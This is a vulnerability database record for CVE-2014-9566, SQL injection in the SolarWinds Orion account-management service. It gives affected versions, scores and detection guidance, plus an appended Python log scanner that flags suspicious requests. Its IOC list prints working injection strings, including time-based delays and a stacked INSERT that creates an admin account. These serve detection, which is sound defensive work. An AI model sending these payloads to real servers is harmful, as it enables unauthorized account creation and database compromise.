cbcvebase.
CVE-2014-9566
published 2015-03-10

CVE-2014-9566: Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwinds Orion Platform 2015.1, as used in…

Priority: P2 (66, high) · CVSS 2.0 base score: 7.5
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 47.75% (98.7th percentile)
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwinds Orion Platform 2015.1, as used in Network Performance Monitor (NPM) before 11.5, NetFlow Traffic Analyzer (NTA) before 4.1, Network Configuration Manager (NCM) before 7.3.2, IP Address Manager (IPAM) before 4.3, User Device Tracker (UDT) before 3.2, VoIP & Network Quality Manager (VNQM) before 4.2, Server & Application Manager (SAM) before 6.2, Web Performance Monitor (WPM) before 2.2, and possibly other Solarwinds products, allow remote authenticated users to execute arbitrary SQL commands via the (1) dir or (2) sort parameter to the (a) GetAccounts or (b) GetAccountGroups endpoint.

Affected

8 ranges (fixed versions taken from the description above)

Vendor       Product                                    Version range   Fixed in
solarwinds   orion_ip_address_manager                   <= 4.2          4.3
solarwinds   orion_netflow_traffic_analyzer             <= 4.0          4.1
solarwinds   orion_network_configuration_manager        <= 7.3.1        7.3.2
solarwinds   orion_network_performance_monitor          <= 11.4         11.5
solarwinds   orion_server_and_application_manager       <= 6.1          6.2
solarwinds   orion_user_device_tracker                  <= 3.1          3.2
solarwinds   orion_voip_network_quality_manager         <= 4.1          4.2
solarwinds   orion_web_performance_monitor              <= 2.1          2.2

Detection & IOCs (extracted from sources)

  • command: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--
  • command: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--
  • command: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM master..sysdatabases) END))
  • command: sort=(SELECT (CASE WHEN (8998=8998) THEN CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68) ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC
  • command: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC
  • command: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--
  • command: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--
  • command: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC
  • command: ASC;insert into accounts values ('notadmin', '127-510823478-74417-8', '/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==', 'Feb 1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0, 0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '', 0, '');
  • url: https://github.com/rapid7/metasploit-framework/pull/4836
  • Monitor HTTP GET requests to /AccountManagement.asmx targeting the GetAccounts or GetAccountGroups endpoints for SQL metacharacters (semicolons, WAITFOR, CASE/WHEN, CHAR()) in the 'sort' or 'dir' query parameters.
  • Alert on requests to AccountManagement.asmx authenticated with the Guest account (especially with a blank password), as the lack of ACL enforcement allows Guest-level exploitation of admin endpoints.
  • Detect stacked SQL injection attempts using WAITFOR DELAY patterns in HTTP query parameters targeting SolarWinds Orion web services.
  • Detect unauthorized INSERT INTO accounts SQL statements in database logs or WAF logs, particularly inserting new users with admin privileges and blank passwords.
  • Look for the Metasploit auxiliary module solarwinds_orion_sqli being used against the environment; it targets the GetAccounts endpoint for admin account creation via stacked SQL injection.
  • The SQL user used by the Orion application is not a database administrator and xp_cmdshell is unavailable, limiting post-exploitation OS-level command execution via this vector.
  • Trial installations deploy a local SQL Server Express instance; non-trial versions may use a remote SQL server, which could affect exploitation scope and lateral movement potential.
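The detection logic described in the bullets above, written out as an added example that is not part of this record, of SolarWinds' code or of the Metasploit module: a small Python scanner that allow-lists the expected sort/dir values on the GetAccounts and GetAccountGroups endpoints and separately flags Guest-account use of the service. The log lines, the /Orion/Services path prefix, client IPs and usernames are constructed assumptions for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (Common Log Format). The /Orion/Services path
# prefix, client IPs and usernames are assumptions made for this example.
SAMPLE_LOG = [
    '10.0.0.5 - admin [10/Mar/2015:10:01:02 +0000] "GET /Orion/Services/AccountManagement.asmx/GetAccounts?sort=Accounts.AccountID&dir=ASC HTTP/1.1" 200 512',
    '10.0.0.9 - Guest [10/Mar/2015:10:01:07 +0000] "GET /Orion/Services/AccountManagement.asmx/GetAccounts?sort=Accounts.AccountID&dir=ASC%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 512',
    '10.0.0.9 - Guest [10/Mar/2015:10:01:20 +0000] "GET /Orion/Services/AccountManagement.asmx/GetAccountGroups?sort=(SELECT%20(CASE%20WHEN%20(1%3D1)%20THEN%20CHAR(65)%20ELSE%201%20END))&dir=ASC HTTP/1.1" 200 512',
    '10.0.0.7 - admin [10/Mar/2015:10:02:00 +0000] "GET /Orion/Default.aspx HTTP/1.1" 200 1024',
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
# Legitimate values: a bare column name for sort, ASC/DESC for dir. Anything else is flagged.
SORT_OK = re.compile(r'^[A-Za-z_][A-Za-z0-9_.]*$')
DIR_OK = re.compile(r'^(?:ASC|DESC)$', re.IGNORECASE)
# Tokens seen in the advisory's payloads; reported so the analyst sees why a request fired.
SQLI_TOKENS = re.compile(r'(;|--|\bWAITFOR\b|\bDELAY\b|\bCASE\b|\bWHEN\b|\bSELECT\b|\bINSERT\b|\bCHAR\s*\()', re.IGNORECASE)
ENDPOINTS = ('getaccounts', 'getaccountgroups')

def inspect_line(line):
    """Return a finding for a suspicious AccountManagement.asmx request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    path = url.path.lower()
    if 'accountmanagement.asmx' not in path or not path.endswith(ENDPOINTS):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes the values
    reasons = []
    for name, allowed in (('sort', SORT_OK), ('dir', DIR_OK)):
        for value in params.get(name, []):
            if not allowed.match(value):
                tokens = sorted({t.upper() for t in SQLI_TOKENS.findall(value)})
                reasons.append(f"{name} not allow-listed (tokens: {', '.join(tokens) or 'none'})")
    if m.group('user').lower() == 'guest':  # Guest reaching an account-management endpoint
        reasons.append('Guest account calling an account-management endpoint')
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'user': m.group('user'),
            'endpoint': path.rsplit('/', 1)[-1], 'reasons': reasons}

def scan(lines):
    """Run inspect_line over an iterable of log lines and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Against the constructed sample, the first and last lines pass silently and the two Guest requests are reported with the offending parameter and the SQL tokens found in it.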

CVSS provenance

nvd: CVSS v2.0 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
osv: 5.5 MEDIUM